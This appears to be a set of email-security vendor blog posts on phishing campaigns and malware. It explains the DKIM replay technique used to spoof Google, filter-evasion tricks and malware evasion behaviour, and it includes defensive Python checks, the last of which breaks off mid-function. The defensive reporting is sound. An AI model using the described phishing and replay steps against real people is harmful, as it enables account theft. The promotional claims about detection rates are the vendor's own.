Phishing & Email Spam

Phishing and email spam are estimated to cost industry more than $1 billion each year, and cybercriminals are launching increasingly sophisticated campaigns to extract confidential data or passwords from unsuspecting Internet users.

Part of the reason why phishing and email spam continue to work is the language used within the communication. The message to “Act Now” because an account seems to have been compromised, or because a colleague appears to need urgent support, often causes individuals to act before they think.

Even experienced security experts have been caught by phishing and email spam, and the advice provided to every Internet user is:

  • If you are unsure of whether an email request is legitimate, try to verify it by contacting the sender independently of the information provided in the email.
  • Never reveal confidential data or passwords requested in an email or on a web page you have arrived at after following a link in an email.
  • Enable spam filters on your email, keep your anti-virus software up-to-date and enable two-step authentication on all your accounts whenever possible.
  • Always use different passwords for different accounts, and change them frequently to avoid being a victim of key-logging malware downloads.
  • Remember that phishing and email spam are not limited to email. Watch out for scams sent via social media channels.

Phishing in particular has become a popular attack vector for cybercriminals. Although phishing goes back to the early days of AOL, the number of phishing campaigns reported to the Anti-Phishing Working Group (APWG) has increased tenfold over the past decade.

Phishing is an extension of spam mail and can target small groups of people (spear phishing) or target executive-level management (whale phishing) in order to collect information or gain access to computer systems.

The best way to protect yourself from phishing and email spam is to follow the advice provided above and – most importantly – enable a reputable spam filter to block potentially unsafe emails from being delivered to your inbox.

DKIM Replay Phishing Attempt Spoofs Google and Passes Validation Checks

Hackers have exploited a ‘vulnerability’ to conduct a phishing campaign that made it appear that the phishing email had been sent by Google from the no-reply[@]accounts.google.com address. The email was signed by Google and passed the DomainKeys Identified Mail (DKIM) authentication check, suggesting the email had been sent from a genuine Google account and was authentic, although the email had been sent from a different, non-Google address.

The campaign was identified by developer Nick Johnson, who received an email seemingly sent from no-reply[@]accounts.google.com with the subject Security Alert. The email claimed that Google LLC had been subpoenaed to obtain a copy of the contents of his Google account and that a support case had been opened and transferred to Legal Investigations Support. A support reference number was included along with a link to a Google Sites website, encouraging him to click the link to examine the case materials and “submit a protest,” if necessary, via the option on the support website.

The lure used in this phishing attempt is similar to many other phishing campaigns that threaten legal action or warn about police investigations, although what makes the attempt stand out is how the phisher managed to make the email appear to have been sent by Google and pass the DKIM authentication check, resulting in the email being delivered to his inbox.

While the subject matter was potentially serious, and the email had seemingly been sent by Google, there was a red flag that suggested a phishing attempt. As Johnson noticed, the link in the email did direct him to an official Google site, but it was sites.google.com, a free web-building platform provided by Google for users to create and host free web pages for personal purposes. No official email from Google would direct a user to that platform, and certainly not any message about a subpoena requiring the disclosure of the contents of their Google email account. The link directed Johnson to a fake support portal – a carbon copy of the official support portal, which had been scraped from the official site. The aim of the phish appears to have been to trick Johnson into logging in and disclosing his login credentials, allowing his Google account to be hijacked.

An analysis of the phishing attempt revealed that Google had been tricked into signing the email, allowing the message to bypass spam filtering services since it passed the DKIM and DMARC authentication checks. Closer inspection of the message header revealed that the mailed-by address differed from the From address, and that the message had been delivered using what is known as a DKIM replay attack.

The message had actually been sent to a me@ address at a domain that appeared to be managed by Google. According to Johnson, the attackers registered a domain and created a Google account for me[@]domain.com, then created a Google OAuth app and used the entire phishing message as the app's name. They granted the app access to their Google Workspace account, which prompted Google to send a security alert, containing the app name, to the me[@]domain.com account. That email was then forwarded to Johnson, and since it had been generated and signed by Google, it passed the DKIM check, as none of the parts of the message covered by the signature had been altered.

The weakness exploited is that DKIM signs the message body and selected headers, not the SMTP envelope, so the email passed validation simply because it carried a valid signature. Since the original email was forwarded without any modification to the parts covered by the signature, the validation checks passed. Further, because the alert had been sent to a me@ address, the message appeared to have been delivered to the victim's own email address. Google explained in response to a query that it is aware of the phishing attempt and has rolled out protections to prevent further abuse.
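The gap between what DKIM signs and how the message was actually delivered is something a mail gateway or analyst can check mechanically. The following Python is an added example (not code from the original post or from TitanHQ) using constructed headers and placeholder domains; it records the aligned DKIM d= domain as context and flags the two things the signature never covers, the envelope sender and the actual delivery recipient.

```python
"""Header-consistency checks for a suspected DKIM replay (added example).

DKIM signs the body plus the headers listed in its h= tag, not the SMTP
envelope, so a message forwarded verbatim keeps a valid, DMARC-aligned
signature. These checks compare the signed parts against unsigned
delivery data. All addresses and domains below are constructed placeholders.
"""
import email
from email import policy
from email.utils import getaddresses, parseaddr


def domain_of(addr: str) -> str:
    """Lower-cased domain part of an RFC 5322 address, or '' if absent."""
    _, address = parseaddr(str(addr or ""))
    return address.rpartition("@")[2].lower()


def dkim_tags(msg) -> dict:
    """Tag=value pairs from the first DKIM-Signature header (e.g. d=, h=)."""
    raw = str(msg.get("DKIM-Signature", "")).replace("\r", "").replace("\n", "")
    tags = {}
    for part in raw.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = value.strip()
    return tags


def _aligned(signer: str, sender: str) -> bool:
    """Relaxed DMARC alignment: same domain, or one is a subdomain of the other."""
    return bool(signer and sender) and (
        signer == sender
        or signer.endswith("." + sender)
        or sender.endswith("." + signer)
    )


def replay_indicators(raw_message: str) -> list[str]:
    """Return the indicators found, each formatted as 'name:detail'."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []

    from_dom = domain_of(msg.get("From", ""))
    sig_dom = dkim_tags(msg).get("d", "").lower()
    # A genuine, aligned signature is WHY the replay passes, so it is
    # recorded as context rather than treated as suspicious on its own.
    if _aligned(sig_dom, from_dom):
        findings.append(f"dkim-aligned:{sig_dom}")

    # Return-Path is the envelope sender ("mailed-by" in some clients); it is
    # rewritten by whoever last relayed the message and DKIM never signs it.
    rp_dom = domain_of(msg.get("Return-Path", ""))
    if rp_dom and from_dom and not _aligned(rp_dom, from_dom):
        findings.append(f"envelope-mismatch:{rp_dom}!={from_dom}")

    # A replayed copy keeps the original To: header (the attacker's own
    # mailbox), so the real recipient never appears in To: or Cc:.
    delivered = parseaddr(str(msg.get("Delivered-To", "")))[1].lower()
    listed = {
        a.lower()
        for _, a in getaddresses(
            [str(h) for h in msg.get_all("To", []) + msg.get_all("Cc", [])]
        )
    }
    if delivered and listed and delivered not in listed:
        findings.append(f"recipient-not-in-to:{delivered}")
    return findings


def looks_replayed(raw_message: str) -> bool:
    """True when an aligned signature coexists with both delivery anomalies."""
    names = {f.split(":", 1)[0] for f in replay_indicators(raw_message)}
    return {"dkim-aligned", "envelope-mismatch", "recipient-not-in-to"} <= names


# Constructed sample: a genuine notification forwarded unchanged to a third
# party. bh= and b= are placeholders, not real signature values.
REPLAYED = """\
Delivered-To: victim@example.net
Return-Path: <bounce@forwarder.example>
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=accounts.example.com;
 s=sel1; h=From:To:Subject:Date; bh=PLACEHOLDER=; b=PLACEHOLDER=
From: "Example Accounts" <no-reply@accounts.example.com>
To: me@attacker-registered.example
Subject: Security Alert
Date: Tue, 15 Apr 2025 09:00:00 +0000

Constructed body: the signed headers and body are byte-identical to the
original notification, which is why the signature still verifies.
"""

# Constructed sample: the same notification delivered directly to its recipient.
CLEAN = REPLAYED.replace("bounce@forwarder.example", "bounce@accounts.example.com") \
                .replace("me@attacker-registered.example", "victim@example.net")
```

The signature itself is not re-verified here; the point is that a valid signature and a mismatched delivery path should be read together, not separately.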

The phishing attempt demonstrates the importance of stopping and thinking before clicking on any link in an email, no matter how serious the potential threat. The phishing attempt could easily have led to a compromised Google account had Johnson not stopped to think about the request. Others may not have been as fortunate. While this was the first time that Google is known to have been affected by a DKIM replay attack, it is a known phishing technique and one that can be highly effective.

Security awareness training should make it clear that any email can contain a threat, even if the sender appears to be legitimate. Phishing lures involving legal threats, police investigations, and subpoenas should be included in the training, as these are likely to create the fear that leads to a rapid click. Employees should be told to inspect the message headers to see the sender’s address, and to report any potential threat or suspicious email to their security team. They should also be provided with an easy one-click method of doing so in their email client.

Businesses should also ensure they have advanced anti-spam software with email sandboxing and URL filtering, and have multifactor authentication set up for all email accounts, with phishing-resistant multifactor authentication implemented when possible for the greatest protection.

Email Validation Identified in Sophisticated Phishing Campaigns

Sophisticated phishing campaigns have been identified that avoid detection by ensuring that only approved targets are funneled to the phishing pages where login credentials are harvested. In a standard phishing campaign, a threat actor sends out tens of thousands of phishing emails to an email list. Many lists are freely available but can also be purchased cheaply on dark web marketplaces. This approach is often referred to as spray and pray – send out large numbers of untargeted emails in the knowledge that a small but significant number of individuals will respond.

A variety of lures and social engineering techniques are used to trick the recipient into clicking a link in the email that directs them to a phishing page. The phishing page mimics a well-known company and tells the victim they must provide their login credentials to access the content they are expecting. Harvested credentials are then used to log in to the user’s account. The phishing infrastructure used by threat actors is often identified and the URLs added to real-time blacklists, after which they are blocked by email security solutions. Phishing pages are often detected by crawlers and sandboxing environments, and once a phishing page is added to a real-time blacklist, far fewer individuals reach it. The threat actor then needs to switch to a clean URL, one that has not previously been detected, to continue the campaign.

One new technique recently observed in phishing campaigns limits redirects to phishing pages so that only approved targets reach them, prolonging the lifespan of the pages by keeping crawlers and sandbox environments out. To analyze a suspected phishing page, researchers enter test credentials. A legitimate login page would reject the credentials since they are invalid, but a phishing page would generally capture the data and redirect the user to a URL of the threat actor’s choosing, which could be the genuine login page of the service being impersonated. The new technique validates the email addresses that are entered: if the address is not on the original phishing list, the login attempt is rejected and there is no redirect to the phishing page, thus preventing analysis. This is achieved by adding validation scripts to phishing pages that check email addresses in real time, or alternatively through API integrations. While this approach adds sophistication that would likely be unavailable to less skilled cybercriminals, these tools are now being included in phishing kits. Phishing kits provide the infrastructure so that even low-skilled cybercriminals can conduct highly sophisticated phishing campaigns. The kits, which can be used for a fee, can also include tools to bypass multi-factor authentication.

The increasing sophistication of phishing campaigns means businesses need to implement sophisticated phishing defenses, which means adopting a defense-in-depth approach with multiple overlapping layers of protection. In practice, that means a spam filtering service to prevent phishing emails from reaching their intended targets. Advanced spam filters for incoming mail, such as SpamTitan, incorporate multiple layers of protection by analyzing every aspect of incoming emails and subjecting them to in-depth analysis to validate their legitimacy. This includes antivirus engines for malware detection, email sandboxing for in-depth analysis of files to identify novel malware, and AI and machine learning to identify phishing and other malicious content, including checks of how an email deviates from typical emails received from a business. The SpamTitan enterprise spam filter also includes multiple validation checks of the sender’s email and domain, greylisting to initially reject messages and request resending to block spam, and allow-listing, blocking, and dedicated blocklists created through extensive threat intelligence gathering.

An anti-phishing solution is recommended for Microsoft 365 environments to catch the malicious emails that Microsoft often misses. The PhishTitan anti-phishing solution integrates seamlessly with Microsoft 365, blocking more threats by augmenting Microsoft’s defenses with the same engine that powers SpamTitan. PhishTitan also adds banners to inbound emails from external sources to alert users to potential risks and combats spoofing and masking by rewriting URLs, showing their true destination. In independent tests, TitanHQ’s email security suite has been proven to provide exceptional protection against phishing, spam, and malware with 100% detection rates in Q4, 2024, and more than 99.99% accuracy in Q1, 2025.

Multifactor authentication should be configured for all email accounts to provide an additional layer of protection, and all users should be provided with ongoing security awareness training. For the most effective training, it should be conducted continuously in small chunks each month rather than an annual training session. A phishing simulator should also be used to reinforce training and identify individuals who fail to recognize phishing attempts to ensure they can be provided with the additional training they need. The SafeTitan security awareness training and phishing simulation platform makes this easy for businesses.

Give the TitanHQ team a call for more information on increasing the sophistication of your email defenses. All TitanHQ solutions are also available on a free trial to allow you to put them to the test in your own environment before making a purchase decision.

The Human Element is Involved in 60% of Data Breaches

The latest data from Verizon has revealed that phishing was the third most common method of initial access in the data breaches the firm analyzed for its 2025 Data Breach Investigations Report. Phishing accounted for 16% of all data breaches in 2025, having been overtaken by vulnerability exploitation (20%). The leading initial access method was credential misuse, which was involved in 22% of data breaches. Verizon does note, however, that while incident responders may identify compromised credentials as the cause, it is not always clear how those credentials were obtained. It is possible that they were obtained in a previous phishing attack that went undetected, so phishing may have been involved in a higher percentage of data breaches.

The report highlights the extent to which cybercriminals exploit human weaknesses. The human element was involved in approximately 60% of data breaches in 2024, down slightly from the 61% of data breaches the previous year. The human element could involve a click on a link in a phishing email, resulting in the theft of credentials, a visit to a malicious website where malware is downloaded, a misconfiguration that is exploited, or a response to a phone call or text message. In 32% of data breaches, the human element was ascertained to result in credential abuse, 23% involved social interactions, 14% involved errors, and 7% involved interactions with malware.

This year’s report delves into the importance of security awareness training and how providing regular training can really make a difference to an organization’s security posture, especially when combined with phishing simulations. Providing training to the workforce will teach employees about security best practices, which will help to eradicate risky behaviors. Employees should be taught how to identify a phishing email and be conditioned to report any suspicious emails to their security team immediately. Phishing simulations help to reinforce training and identify individuals who have failed to apply the training. If an individual fails a phishing simulation, they can be provided with additional training to help ensure they do not make a similar identification error in the future.

The report revealed that out of the companies that provided security awareness training and conducted phishing simulations, there was a much higher reporting rate when employees had received training more recently. The baseline reporting rate was 5%, which shot up to 21% with recent training.

The data shows why it is so important to provide ongoing security awareness training to keep cybersecurity matters fresh in the mind. It is also important to incentivize employees to report potential phishing emails rather than punish those who don’t, and to clearly explain that reporting suspicious emails helps security teams to contain threats more quickly and limit the damage. It is also important to make it as easy as possible for employees to report potential threats. Ideally, employees should be able to report a potential phishing or scam email with a single click in their email client.

TitanHQ offers an email security suite that includes the SpamTitan cloud-based anti-spam service and the PhishTitan phishing prevention and remediation solution for Microsoft 365 users. SpamTitan incorporates dual anti-virus engines for detecting known malware, email sandboxing for detecting novel threats, AI and machine learning algorithms for identifying phishing and spam emails, plus SPF, DKIM & DMARC checks, allow listing, blocking, greylisting, and dedicated real-time block lists. An email client add-in is also provided to allow employees to easily report potential threats.

The PhishTitan solution is based on the same engine that powers SpamTitan, incorporating AI and machine learning to detect phishing threats, and also adds banner notifications for emails to warn employees about potential threats from external email addresses. The remediation tools provided by PhishTitan allow security teams to rapidly respond to threats and eliminate them from their email system.

Both email security solutions have high detection accuracy and provide best-in-class protection from email threats. In recent independent tests at VirusBulletin, the solutions were demonstrated to have exceptional detection accuracy, blocking in excess of 99.99% of spam and phishing threats, and thanks to the email sandbox service, TitanHQ’s solutions blocked 100% of malware.

TitanHQ can also help with security awareness training and phishing simulations. The SafeTitan platform makes it easy to create and automate continuous security awareness training programs for the workforce. The training content is enjoyable and interactive and is delivered using computer-based training, with individual modules taking no more than 10 minutes to complete.

The training content is regularly updated and has been proven to improve security awareness and reduce susceptibility to cyber threats, especially when combined with TitanHQ’s phishing simulator. Internal simulated phishing campaigns can be created and automated, and will automatically generate additional training immediately in response to a security failure, ensuring training is delivered at the time when it is most likely to be effective.

Through security awareness training and phishing simulations, organizations can reduce the employee errors that cause so many data breaches, and by using TitanHQ’s email security suite, threats will be blocked before employees’ security awareness is put to the test.

Give the TitanHQ team a call today to discuss the best options for improving your defenses. All TitanHQ solutions are available on a free trial and assistance can be provided to help you get the most out of the free trial.

UK Government Survey Confirms Phishing is the Biggest Threat to UK Businesses

A recently published report commissioned by the UK’s Home Office and Department for Science, Innovation and Technology (DSIT) has revealed that 43% of UK businesses and 30% of UK charities experienced a cybersecurity breach in the past 12 months.

While there was a slight fall in the number of businesses and charities suffering a cybersecurity incident, there was a significant increase in ransomware attacks. The survey was conducted on 2,180 businesses, 1,081 charities, and 574 educational institutions. Based on the number of confirmed cyber incidents, that equates to around 612,000 UK businesses and 61,000 UK charities experiencing a cyber breach or a cyberattack in the past 12 months.

While there was a slight decline in cyber incidents, which were confirmed by 50% of businesses in last year’s study, it is clear that hacking and other types of cyber incidents continue to pose a massive threat to UK businesses, with ransomware attacks of particular concern. According to the report, the estimated percentage of ransomware crime increased from less than half a percent in 2024 to 1% in 2025, which suggests that around 19,000 UK businesses experienced a ransomware incident in the past 12 months. 4% of large businesses and 3% of medium-sized businesses admitted to paying the ransom demand to recover their data and prevent its publication online.

The biggest cyber threat to UK businesses by some distance is phishing. Phishing is the fraudulent practice of sending emails or other messages that trick individuals into disclosing sensitive information such as login credentials or installing malware. Over the past 12 months, 93% of businesses and 95% of charities that experienced a cybercrime incident identified phishing as the cause of at least one of those incidents. Businesses that were confirmed victims of cybercrime experienced an average of 30 cybercrime incidents in the past 12 months, with charities experiencing an average of 16.

The credentials stolen in these attacks and the malware installed give cybercriminals initial access to internal networks. From there, they can deploy additional malware payloads and ransomware and steal sensitive data. The phishing problem is also getting worse for businesses, as cybercriminals are leveraging large language models (LLMs) to craft extremely convincing phishing emails and conduct phishing attacks at scale. These tools can be used to generate fake images, make phishing lures more believable, and make them harder to detect.

With phishing such a major threat and the high cost of dealing with each phishing incident, UK businesses and charities need to have email security defenses capable of detecting and blocking phishing threats, including those developed using AI and LLMs.

Phishing defenses should consist of anti-spam software, multifactor authentication, and end user security awareness training as a minimum. Advanced email filtering software incorporates antivirus software to identify known malware threats, email sandboxing for detecting novel malware threats, link scanning, and machine learning and AI-aided detection.

Over the past three quarters, SpamTitan from TitanHQ has consistently demonstrated in independent tests that it is capable of blocking even the most advanced threats, routinely achieving a 100% malware detection rate, and phishing and spam detection rates in excess of 99.99%.

TitanHQ also offers a comprehensive security awareness training and phishing simulation platform – SafeTitan – for improving awareness of cyber threats. When combined with phishing simulations, the platform has been shown to reduce employee susceptibility to phishing by up to 80%. The training content is enjoyable and memorable, and is delivered in training modules of no more than 10 minutes to maximize knowledge retention and make training easy to fit into busy workflows.

All TitanHQ solutions have been developed to provide powerful protection and advanced features, while also being easy to set up, configure, and use. Further, they are available at a price point that is affordable for businesses of all sizes. Give the TitanHQ team a call today to find out more about improving your defenses against phishing and other cyber threats. Further, TitanHQ’s cloud-based anti-spam service and security awareness training platform are available on a free trial, allowing you to put them to the test before making a purchase decision.

Wine-Tasting Phishing Emails Used to Target Embassy Staff in Malware Campaign

A phishing scam has been identified targeting staff of European embassies with an invitation to a fake wine-tasting event. Targets include European diplomats and the staff of non-European countries at embassies located in Europe. The campaign has been linked to the Russian state-sponsored hacking group, Cozy Bear (aka APT29, Midnight Blizzard), and is believed to be primarily an espionage campaign.

The aim of the campaign is to deliver a stealthy new backdoor malware dubbed GrapeLoader. The campaign, identified by Check Point, is believed to be part of a wider campaign targeting European governments, diplomats, and think tanks. The malware delivered in the campaign serves as a loader for delivering additional payloads and is used as an initial stage tool for fingerprinting and establishing persistence.

As is typical of spear phishing campaigns, considerable effort has been put into creating a lure likely to elicit a response. A fake diplomatic event is used, commonly related to wine tasting, with some emails offering a place at a diplomatic dinner. The messages purported to come from a specific individual at a legitimate European foreign affairs ministry, which was impersonated. A series of follow-up messages is sent to individuals who fail to respond to the fake invite. The phishing link is also configured to redirect the user to the real foreign ministry website if it is opened outside of the expected time zone or by an automated tool.

The emails prompt the recipient to click on an embedded hyperlink that directs them to a spoofed website, where they are prompted to download a file. If successful, the user downloads a zip file containing a PowerPoint executable called wine.exe and two hidden DLL files, one of which allows the PowerPoint executable to run. The PowerPoint executable is used for DLL sideloading of the other DLL, dubbed GrapeLoader, which is used to deliver additional payloads. GrapeLoader fingerprints the device and establishes contact with its command-and-control server. A Run registry key is added to ensure that wine.exe is executed following a reboot.

The malware has been designed to be stealthy, masking strings in its code and decrypting them in memory only for a short time before they are erased. This technique hinders analysis using tools such as FLOSS. The malware also makes memory pages temporarily inaccessible to evade antivirus scans. GrapeLoader is thought to lead to the delivery of a modular backdoor known as WineLoader, which has been used in previous Cozy Bear campaigns against governments and political parties.

GetShared and Other Legitimate Services Abused in Phishing Campaigns

One of the common tactics for getting phishing emails into inboxes is to send them via a legitimate service, as the messages are then far less likely to be blocked by email security solutions. Email security solutions perform reputation checks on email addresses and domains, and if these are determined to have been used for spamming or sending malicious emails, they are rapidly added to real-time blocklists (RBLs). If a sender’s reputation falls below a certain trustworthiness threshold, its messages are blocked and quarantined, ensuring they do not reach their intended targets.

These reputation checks are often passed if emails are sent via trusted services such as Dropbox and Google Calendar, and similarly if malicious files or content are hosted on legitimate services such as OneDrive, GitHub, Google Drive, or SharePoint. This has not been lost on threat actors, who regularly abuse these services.

Fake login pages may be hosted on cloud storage services, and malicious files shared through them. Not only can these emails evade checks due to the good reputation of the sites, these well-known brands are familiar to end users and are often trusted, increasing the probability that credentials will be divulged or files will be downloaded.

For instance, a recent campaign abusing Dropbox used the platform to send an email about a shared file, which was also hosted on a legitimate Dropbox account. The email contained a link to a malicious PDF file, branded with the details of a company known to the targeted employees. The PDF file contained a link to another, unrelated website, where a malicious file was hosted. The phishing emails used a plausible lure to convince the user to click the link and download and execute the file.

A new campaign has recently been identified that uses a different legitimate service to evade reputation checks. The campaign, detected by security researchers at Kaspersky, was sent via a service called GetShared. While not as well-known as Google Calendar or Dropbox, the platform had a vulnerability that could be abused to send emails from a trusted domain and file-sharing service.

Similar to the Dropbox campaign, GetShared was used to send an email to targeted individuals advising them that a file had been shared with them via GetShared, as it was too large to send via email. The use of the file-sharing service seems reasonable, and the urgency was believable. The user was told that the file would be deleted after a month, and they were asked to provide a quote including the delivery time and payment terms. One of the intercepted emails targeted a designer using a shared file called DESIGN LOGO.rar.

The user was given a download button linking to the site where the file could be downloaded. If the compressed file is opened and its contents extracted, several attack methods are possible. The archive could contain an executable with a double file extension, making it likely that the file would be run. It could contain a link to a malicious document or phishing page, although in this case it was part of a vishing campaign: the compressed file contained contact details for the user to call, and the call would be used to coax a file download or the disclosure of credentials or other sensitive information.

Earlier this year, a campaign was identified that used Google Calendar, with the emails sent through the platform containing a calendar invite. The invite is automatically added to the user’s Google Calendar account if they have Calendar set up and configured to automatically accept invitations. The invite contained a link to Google Forms or Google Drawings, which contained a link to a phishing website. That website impersonated a well-known brand and required the user to log in with their credentials. The campaign targeted more than 300 brands including healthcare providers, educational institutions, banks, and others, and involved thousands of emails.

Traditional email security solutions are unlikely to block emails from these trusted senders, and malicious files hosted on trusted platforms are also unlikely to be blocked. Businesses can combat these types of phishing attacks by using an advanced email spam filter that incorporates AI and machine learning algorithms and email sandboxing in addition to the standard reputation checks and blacklists. The best spam filters for businesses provide multiple layers of protection to block these malicious emails and prevent them from reaching inboxes; however, due to the difficulty in distinguishing genuine from malicious communications from legitimate platforms, security awareness training is vital.

Employees should be trained on how to identify phishing emails and told not to trust emails from legitimate platforms, as while the platforms can be trusted, the content cannot. It is also recommended to use a phishing simulator to run simulations of phishing using lures that abuse trusted platforms to gauge how employees respond and provide targeted training to individuals who are tricked by these campaigns.

Stealthy New Malware Used in Targeted Campaigns on Healthcare and Pharma Firms

Healthcare organizations and pharmaceutical firms are being targeted in a phishing campaign distributing a recently discovered remote access trojan (RAT) called ResolverRAT. The campaign has been linked to infrastructure previously used to deliver information stealers such as Lumma Stealer and Rhadamanthys, indicating an experienced threat actor is behind the campaign.

ResolverRAT is a stealthy RAT that runs entirely in memory, which means it is not detected by traditional antivirus solutions since no files are written to disk. Security solutions monitor Win32 API and file system operations and can detect anomalous activity; however, ResolverRAT abuses .NET ResourceResolve events to load malicious assemblies without making those API calls, helping it evade monitoring tools.

The malware achieves persistence by adding XOR-obfuscated keys to the Windows Registry and by placing files in filesystem locations such as StartUp, Program Files, and LocalAppData, ensuring it is executed after a reboot. To make patterns in its callbacks to its command-and-control server harder to detect, the malware communicates at random intervals. The malware is capable of data exfiltration; even large files can be exfiltrated through a chunking process that helps avoid detection by blending in with regular traffic. The malware has been designed to resist analysis, and most of its components are unique, strongly suggesting it was created from scratch by a skilled malware developer.

As with many other phishing campaigns, the ResolverRAT campaign uses social engineering techniques to trick end users. Lures are used that create a sense of urgency, demanding that action be taken immediately to prevent significant costs and legal problems. Emails used in the campaign include notices about copyright violations and other legal issues that require immediate action, along with a threat of legal consequences if the matter is not corrected immediately.

The emails contain a link to a website where the user is prompted to download and open a file to obtain more information about the legal issue – a copyright violation or legal investigation. If the link is clicked and the downloaded file is executed, ResolverRAT will be executed and will run in memory through a DLL side-loading technique. The campaign has been conducted in multiple countries, with the lures written in the languages predominantly spoken in those countries – English, Italian, Czech, Turkish, Portuguese, Indonesian, and Hindi.

While considerable effort has been put into making the malware incredibly stealthy to evade security solutions, the delivery mechanism – phishing emails – allows infections to be blocked. It is important to use a combination of measures to block campaigns such as this. That starts with an advanced spam filtering service to block the phishing emails to prevent them from reaching end users. SpamTitan, a cloud-based anti-spam service from TitanHQ, performs reputation checks of senders, uses greylisting to identify large email runs indicative of spam, phishing, and malware distribution, subjects messages and headers to in-depth analysis, and analyzes embedded URLs and their destinations, with email sandboxing used to securely analyze message content.

Microsoft 365 users should consider augmenting Microsoft’s email security features with a third-party, dedicated anti-phishing solution. PhishTitan from TitanHQ is an anti-phishing and phishing remediation solution that improves phishing and malware detection rates for Microsoft 365, adds email banners to alert users to emails from external addresses, protects against malicious links in emails, and incorporates tools to allow malicious emails to be rapidly remediated across the entire email system. In independent tests, these solutions have been shown to block 100% of malware and in excess of 99.99% of phishing emails.

A web filter is also recommended to protect against redirects to malicious websites and block malware downloads from the Internet, adding an extra layer to your security defenses. It is also important to provide regular security awareness training to employees to show them how to identify the signs of phishing, condition them to report potential threats to their security team, and teach security best practices. Training should also be reinforced by using a phishing simulator to conduct phishing simulations internally.

Give the TitanHQ team a call today for more information on improving your defenses against phishing and malware infections to block sophisticated malware threats, including improving protection for Microsoft 365 environments. All TitanHQ solutions are available on a free trial and have been developed from the ground up to meet the needs of MSPs to help them better protect their clients against the ever-evolving cyber threat landscape.

SocGholish Malware Used to Deliver RansomHub Ransomware

RansomHub is one of the most prolific ransomware-as-a-service (RaaS) groups now that the ALPHV/BlackCat operation has shut down and the LockBit operation has been hit with successive law enforcement actions. RansomHub engages in double extortion tactics, exfiltrating sensitive data from victims’ networks and encrypting files. Victims must pay to obtain the keys to decrypt their data and to prevent the publication of the stolen data on the RansomHub data leak site. Since emerging in early 2024, the group has conducted more than 200 attacks.

As a RaaS operation, RansomHub uses affiliates to conduct attacks in exchange for a percentage of any ransom payments they generate. The affiliates each have their specialties for breaching victims’ systems, including phishing, remote desktop protocol attacks, and the exploitation of unpatched vulnerabilities. Now a new tactic is being used: the group is using the SocGholish malware-as-a-service (MaaS) framework for initial access, especially in attacks on the government sector.

SocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader that is primarily delivered via compromised legitimate websites. After compromising a website, malicious scripts are added that redirect users to webpages that display browser update notifications. These sites use social engineering to trick visitors into downloading a browser update, as they are told that their browser has a security issue or is not functioning correctly. If the user agrees, they download a zip file that contains a JavaScript file. If that file is executed, SocGholish malware is installed.

SocGholish is a malware downloader that provides initial access to a victim’s network. The malware has been used to deliver a wide range of payloads, including AZORult, Gootloader, NetSupport, and Dridex. SocGholish has also previously been used to deliver DoppelPaymer ransomware, and now RansomHub ransomware. In the case of RansomHub, the group deploys Python-based backdoor components for RansomHub affiliates to use for initial access.

Preventing SocGholish infections is critical to preventing RansomHub ransomware attacks; however, prevention requires a defense-in-depth approach. Traffic to the compromised websites can come from emails with embedded hyperlinks, malvertising, and SEO poisoning, and links to compromised websites are also delivered to users via Google Alerts. The webpages that host the fake browser updates filter traffic and block access by sandboxes, which can make detection difficult.

The best approach is to use advanced anti-spam software such as SpamTitan to block malicious emails. In the last quarterly round of testing at VirusBulletin, SpamTitan, a cloud-based antispam service from TitanHQ, ranked #1 for malware detection, phishing detection and spam blocking with a 0% false positive rate, and in the February 2025 tests, achieved a perfect score blocking 100% of malware, phishing, and spam emails. The high detection rate is due to extensive front-end tests, email sandboxing, and machine learning.

A web filter adds an important layer of protection by scanning websites for malicious content and blocking access to known malicious websites. The WebTitan DNS filter is fed extensive threat intelligence to block access to known compromised webpages, can filter websites by category, and can be configured to block downloads of executable files from the Internet. Security awareness training is vital for creating a human firewall. Employees should be informed about the risks of interacting with security warnings on the Internet, taught how to identify phishing attempts, and instructed on security best practices. The SafeTitan security awareness training and phishing simulation platform makes creating and automating training courses and phishing simulations quick and easy.

QR Code Phishing Scam Requests Verification of Tax Information

One of the ways that cybercriminals are bypassing traditional email security solutions is to use QR codes rather than embedded hyperlinks in their phishing emails. QR codes are increasingly used by businesses to drive traffic to web pages, as consumers do not need to go through the process of typing a URL into their browser. The QR code can simply be scanned with a smartphone camera, the URL will be recognized, and the web resource can be visited with a single tap of the finger.

Spam filtering services will detect links in emails, check them against blacklists of known malicious websites, and will often follow the links to find the destination URL. If the website is malicious, the email will not be delivered to the user’s inbox. By using a QR code rather than a hyperlink, there is an increased chance that the message will be delivered, as many anti-spam software solutions are incapable of reading QR codes.

One such campaign has recently been identified that warns the recipient that they must review and update their tax records. The email has the subject, “urgent reminder,” and claims to have been sent by the Tax Services Team. The email has a PDF file attachment and advises the recipient that a review of their tax records must be completed by April 16, 2025, to avoid potential penalties. Tax season is well underway and annual tax returns need to be submitted by April 15, 2025, so the deadline for a response is plausible.

Rather than include a link, the PDF file includes a QR code, which the user is told they should scan with their mobile device to access the secure tax portal, where they must log in, review their tax information, and confirm it is up to date.

If the QR code is scanned and the link followed, the user must first pass a CAPTCHA test, after which they are presented with a Microsoft login prompt and asked to enter their password. The form is already populated with the user’s email address to make it appear that the user is known or has visited the site before, adding an air of legitimacy to the scam. If the password is entered, it will be captured and used to hijack the user’s Microsoft account. After entering the password, the user is told “We could not find an account with that username. Try another account,” which may allow the attacker to steal credentials for another account.

QR code phishing forces users onto a mobile device, which typically has weaker security than a desktop computer or laptop, and mobile browsers usually show only the domain name rather than the full URL, which helps to make the link seem legitimate. Phishers also often use open redirects on legitimate websites to make their links appear authentic and hide the final destination URL.
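The open-redirect trick above can be caught before a link is ever followed: a redirector URL carries its real destination in a query parameter, either as plain text or base64-encoded. The following Python is an added example written for this page, not code from the original post or from any TitanHQ product; the trusted-portal.example and login-verify.example hosts and the sample links are constructed. It goes slightly beyond the article by also decoding base64 and base64url targets, which some redirectors use.

```python
"""Flag links whose query string carries a second URL (open-redirect style)."""
import base64
import binascii
from urllib.parse import urlsplit, parse_qs


def looks_like_url(text):
    """True for an absolute http(s) URL with a host."""
    parts = urlsplit(text)
    return parts.scheme in ("http", "https") and bool(parts.hostname)


def decode_candidate(value):
    """Return the URL carried in a parameter value, if any.

    parse_qs has already undone percent-encoding, so a plain target is
    recognized directly; base64 and base64url targets are tried as well,
    since some redirectors encode the destination that way."""
    if looks_like_url(value):
        return value
    padded = value + "=" * (-len(value) % 4)
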